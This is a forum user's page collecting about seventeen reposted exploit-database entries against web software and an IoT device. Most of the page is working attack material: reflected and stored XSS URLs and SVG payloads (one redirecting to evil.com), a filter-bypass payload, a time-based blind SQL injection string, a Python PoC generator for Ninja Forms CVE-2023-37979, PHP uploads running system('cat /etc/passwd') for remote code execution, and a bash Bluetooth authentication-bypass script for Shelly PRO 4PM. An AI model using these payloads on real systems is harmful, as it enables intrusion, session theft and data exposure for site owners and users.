Everything posted by HireHackking

  1. # Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS # Exploit Author: CraCkEr # Date: 01/08/2023 # Vendor: JLexArt # Vendor Homepage: https://jlexart.com/ # Software Link: https://extensions.joomla.org/extension/jlex-review/ # Demo: https://jlexreview.jlexart.com/ # Version: 6.0.1 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials (session theft requires the cookie to be readable by script, i.e. not HttpOnly). Path: / — the raw query string is reflected into a double-quoted HTML attribute: the payload is injected as a parameter *name* (the `itwed"...b7yzn` key), not as the value of any named parameter, so there is no single "vulnerable parameter". The injected style makes the element cover the whole viewport, so any mouse movement fires the onmouseover handler without a deliberate click. https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1 XSS Payloads: itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
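  # Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979
#
# Workflow: fingerprint the plugin version from the public readme.txt, then
# (with --exploit) generate a local HTML page whose form posts the XSS payload
# to the target's admin-ajax.php. The request is only accepted for a browser
# that already holds an authenticated WordPress session on the target, which
# is what "(Authenticated)" in the title refers to.

import sys
import webbrowser
from pathlib import Path
from time import sleep

from requests import get
from requests.exceptions import RequestException

# The target URL is always the last CLI argument. A trailing slash is stripped
# so "{url}/wp-admin/..." does not produce a double slash. Guarded so importing
# this module without arguments does not raise.
url = sys.argv[-1].rstrip("/") if len(sys.argv) > 1 else ""

# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"  # last affected release; every version <= this is vulnerable

# NOTE(review): the "security" field in the form below is a WordPress nonce
# captured on the author's test instance. WP nonces are bound to the site, the
# user and a time window, so this fixed value is unlikely to be accepted on any
# other target; capture a fresh nf_batch_process nonce from the victim site's
# page source before use.
#
# HTML template (f-string: CSS braces are doubled to escape them)
HTML_TEMPLATE = f"""<!DOCTYPE html>
<!-- Created By Mehran Seifalinia -->
<html>
<head>
<title>{CVE_NAME}</title>
<style>
body {{ font-family: Arial, sans-serif; background-color: #f7f7f7; color: #333; margin: 0; padding: 0; }}
header {{ background-color: #4CAF50; padding: 10px; text-align: center; color: white; font-size: 24px; }}
.cool-button {{ background-color: #007bff; color: white; padding: 10px 20px; border: none; cursor: pointer; font-size: 16px; border-radius: 4px; }}
.cool-button:hover {{ background-color: #0056b3; }}
</style>
</head>
<body>
<header> Ninja-forms reflected XSS ({CVE_NAME})</br> Created by Mehran Seifalinia </header>
<div style="padding: 20px;">
<form action="{url}/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf&#95;batch&#95;process" />
<input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
<input type="hidden" name="security" value="e29f2d8dca" />
<input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
<input type="hidden" name="method&#95;override" value="&#95;respond" />
<input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
<input type="submit" class="cool-button" value="Click here to Execute XSS" />
</form>
</div>
<div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
<footer>
<a href="https://github.com/Mehran-Seifalinia">Github</a>
</br>
<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a>
</footer>
</body>
</html>
"""


def _parse_version(version: str) -> tuple[int, int, int]:
    """Return (major, minor, patch) parsed from a 'Stable tag' string such as '3.6.25'.

    Only the first three dot-separated components are used.

    Raises:
        ValueError: if fewer than three components are present or one is not an integer.
    """
    parts = version.strip().split(".")
    if len(parts) < 3:
        raise ValueError(f"unexpected version string: {version!r}")
    major, minor, patch = (int(part) for part in parts[:3])
    return major, minor, patch


def is_vulnerable_version(version: str) -> bool:
    """Return True when *version* is at or below VULNERABLE_VERSION (3.6.25).

    Tuple comparison gives the same result as the original chained
    major/minor/patch checks.
    """
    return _parse_version(version) <= _parse_version(VULNERABLE_VERSION)


def exploit():
    """Write the PoC page into the current directory and open it in the default browser.

    The file is named "<CVE_NAME>.html". The path is built with pathlib so it is
    correct on every OS (the original hard-coded a Windows backslash separator).
    """
    poc_path = Path.cwd() / f"{CVE_NAME}.html"
    poc_path.write_text(HTML_TEMPLATE, encoding="utf-8")
    print(f"[@] POC Generated at {poc_path}")
    print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
    sleep(2)
    webbrowser.open(poc_path.as_uri())


# Check if the vulnerable version is installed
def check_CVE():
    """Fetch the plugin's public readme.txt and report whether its version is vulnerable.

    Returns:
        True when the 'Stable tag' is <= 3.6.25, False when the plugin is absent
        or newer. Network errors and an unparsable readme print the error and
        exit the process with status 1.
    """
    try:
        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt", timeout=10)
        if response.status_code != 200 or "Ninja Forms" not in response.text:
            print("[!] Ninja-forms plugin has not installed on this site.")
            return False
        # readme.txt layout: "Stable tag: X.Y.Z ... License: ..."
        version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
        if is_vulnerable_version(version):
            print(f"[*] Vulnerable Ninja-forms version {version} detected!")
            return True
        print(f"[!] Ninja-forms version {version} is not vulnerable!")
        return False
    except (RequestException, IndexError, ValueError) as error:
        print(f"[!] Error: {error}")
        sys.exit(1)


# Check syntax of the script
def check_script():
    """Validate the CLI arguments, run the version check, then honour --exploit.

    Usage: script [--exploit] TARGET. The version check always runs first; the
    PoC page is only generated when the target reports a vulnerable version.
    Invalid usage exits with status 1.
    """
    script_name = sys.argv[0].split("/")[-1]
    usage = f"""
    Usage: {script_name} [OPTIONS] [TARGET]

    OPTIONS:
        --exploit: Open a browser and execute the vulnerability.

    TARGET:
        An URL starts with 'http://' or 'https://'

    Examples:
        > {script_name} https://vulnsite.com
        > {script_name} --exploit https://vulnsite.com
    """
    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print("[!] Syntax error...")
        print(usage)
        sys.exit(1)
    if not url.startswith(("http://", "https://")):
        print("[!] Invalid target...\n\tTarget must start with 'http://' or 'https://'")
        sys.exit(1)
    print("[*]Starting the script >>>")
    if not check_CVE():
        sys.exit(1)
    for arg in sys.argv[1:]:
        if arg.lower() == "--exploit":
            exploit()
        elif arg != url:
            print(f"[!] What the heck is '{arg}' in the command?")


if __name__ == "__main__":
    check_script()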
  3. # Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 20/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/shuttle-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4112 ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php — the extra path segment appended after index.php (PATH_INFO, here `gm5rj"><script>alert(1)</script>bwude`) is reflected unencoded into the page; the query string apparently only selects the admin login view (controller=pjAdmin&action=pjActionLogin&err=1), so no authentication is needed to reach the reflection. https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1
  4. # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/taxi-booking-script/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4116 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php GET parameter 'index' is vulnerable to RXSS (unauthenticated front-end controller) https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS] [-] Done
  5. # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/cleaning-business-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4115 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS] [-] Done
  6. # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/service-booking-script/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4113 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS]
  7. # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 21/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/night-club-booking-software/ # Version: 1.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4114 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=
  8. # Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Database Access ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /mobile-app/v3/ GET parameter 'pid' is vulnerable to SQL Injection https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot --- Parameter: pid (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot --- [-] Done
  9. # Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload # Date: 3-8-2023 # Category: Web Application # Exploit Author: Rajdip Dey Sarkar # Version: 3.3 # Tested on: Windows/Kali # CVE: CVE-2023-39115 Description: ---------------- An arbitrary file upload vulnerability in Campcodes Online Matrimonial Website System Script v3.3 allows attackers to execute arbitrary code via uploading a crafted SVG file. Note (review): the payload below executes JavaScript in the browser of any user who opens the uploaded image — a stored XSS via SVG — not code on the server; no server-side code execution is demonstrated in this PoC, so read the CVE's "execute arbitrary code" wording in that light. Serving user uploads with Content-Disposition: attachment, or from a separate origin, is the usual mitigation in addition to rejecting SVG. SVG Payload ------------------ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> Steps to reproduce -------------------------- -Log in with your credentials (an authenticated account is required; the request below carries a session cookie and CSRF token) -Navigate to /profile-settings -Click Gallery -> Add New Image -> Browse -> Add Files -Choose the SVG file and complete the upload -Click the uploaded image to open it; the script runs. 
Payload Triggered Burp Request ------------------- POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485 Content-Length: 1044 Origin: http://localhost Connection: close Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="relativePath" null -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="name" file (1).svg -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="type" image/svg+xml -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> -----------------------------167707198418121100152548123485--
  10. # Exploit Title: Academy LMS 6.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Version: 6.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4119 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /academy/home/courses GET parameter 'query' is vulnerable to XSS https://website/academy/home/courses?query=[XSS] Path: /academy/home/courses GET parameter 'sort_by' is vulnerable to XSS https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS] XSS Payloads (Blocked) : <script>alert(1)</script> ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd XSS Payload Bypass Filter : cplvz"><img src=a onerror=alert(1)>fk4ap (the filter only rejects the literal <script> tag, not event-handler attributes on other elements, so a denylist is not a fix — the values must be HTML-encoded for the context they are reflected into) [-] Done
  11. # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4117 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description An attacker who sends the victim a link containing a malicious URL (by email or instant message) can perform a wide variety of actions in the victim's browser, such as stealing the victim's session token or login credentials. Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date= [-] Done
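  #!/bin/bash
# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383
#
# Usage: ./shelly_pro4pm.sh [BT_MAC]
#   BT_MAC  Bluetooth address of the target device. Defaults to the address
#           hard-coded in the original PoC (the author's test unit).
# Requires gatttool (bluez) and sudo for raw BLE access. Sends three GATT
# write requests over BLE; press Enter at the banner to start, 'x' to quit.

set -u
IFS=

# Target BLE address (parameterised; was a literal repeated four times).
TARGET_MAC="${1:-c8:f0:9e:88:92:3e}"

RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"

banner() {
    clear
    echo -e "${GREEN}[+]*********************************************************[+]"
    echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"
    echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"
    echo -e "${GREEN}| CVE: CVE-2023-33383 |"
    echo -e "${GREEN}[+]*********************************************************[+]"
    echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
}

# ble_write HANDLE HEXVALUE — one GATT write request to the target.
# Returns gatttool's own exit status so callers can test it directly.
# (The original tested $? only after an intervening `sleep 1`, so it was
# checking sleep's status and the failure branch could never trigger.)
ble_write() {
    local handle="$1" value="$2"
    sudo gatttool -b "$TARGET_MAC" --char-write-req -a "$handle" -n "$value" >/dev/null 2>&1
}

banner
read -s -n 1 key
# Only Enter (empty read) proceeds; 'x' or any other key exits quietly.
if [ "$key" != "" ]; then
    exit 0
fi

# Reachability check: a primary-service discovery that returns nothing within
# 5 s is treated as "device not reachable".
gattout=$(sudo timeout 5 gatttool -b "$TARGET_MAC" --primary)
if [ -z "$gattout" ]; then
    echo -e "${RED}Connection timed out${ENDCOLOR}"
    exit 0
fi

# Step 1: write 00000001 to handle 0x000d (presumably a CCCD enabling
# notifications — not confirmed from this script alone).
if ! ble_write 0x000d 00000001; then
    echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
    exit 1
fi
echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
sleep 1

# Step 2: short write to handle 0x0008 (the trigger for the out-of-bounds read
# described in the linked blog post).
if ! ble_write 0x0008 ab; then
    echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
    exit 1
fi
sleep 1

# Step 3: follow-up write to the same handle; the original did not check its status.
ble_write 0x0008 abcd
sleep 1
for _ in {1..5}; do
    echo -ne "${GREEN}."
    sleep 1
done
echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"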
  13. # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-2796 # 1. Description The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
  14. Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Application: webedition Cms Version: v2.9.8.8 Bugs: RCE Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Log in to an account that may create pages (authenticated; the PoC request below carries a WESESSION cookie) 2. Go to New -> Webedition page -> empty page 3. Select php as the document extension 4. Put "><?php echo system("cat /etc/passwd");?> into the Description area and save — in the request below this is the txt[Description] field of a document saved with Extension=.php 5. Open the created page. The RCE claim rests on the description being written into the generated .php document without escaping, so the server executes it; confirm on a test install, since the code path is not shown here. Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1 Host: localhost Content-Length: 1621 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close 
we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
  15. Exploit Title: Webutler v3.2 - Remote Code Execution (RCE) Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutler_v3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Log in to an administrator account (the upload endpoint sits under /admin/) 2. Go to the Media section 3. Upload a file named poc.phar with the contents: <?php echo system("cat /etc/passwd");?> — the .phar extension is accepted by the upload filter; whether it then executes depends on the web server mapping .phar to the PHP handler, which common Apache/PHP packaging does (the Debian php module matches \.ph(ar|p|tml)$) — confirm on the target 4. Browse to the uploaded poc.phar to execute the payload poc request: POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1 Host: localhost Content-Length: 40 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 X_FILENAME: poc.phar sec-ch-ua-platform: "" Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/webutler_v3.2/admin/browser/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu Connection: close <?php echo system("cat /etc/passwd");?>
  16. # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-3219 # 1. Description The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
  17. Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS Application: Webedition CMS Version: v2.9.8.8 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login to account 2. Go to New -> Media -> Image 3. Upload malicious svg file svg file content: """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: localhost Content-Length: 761 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close 
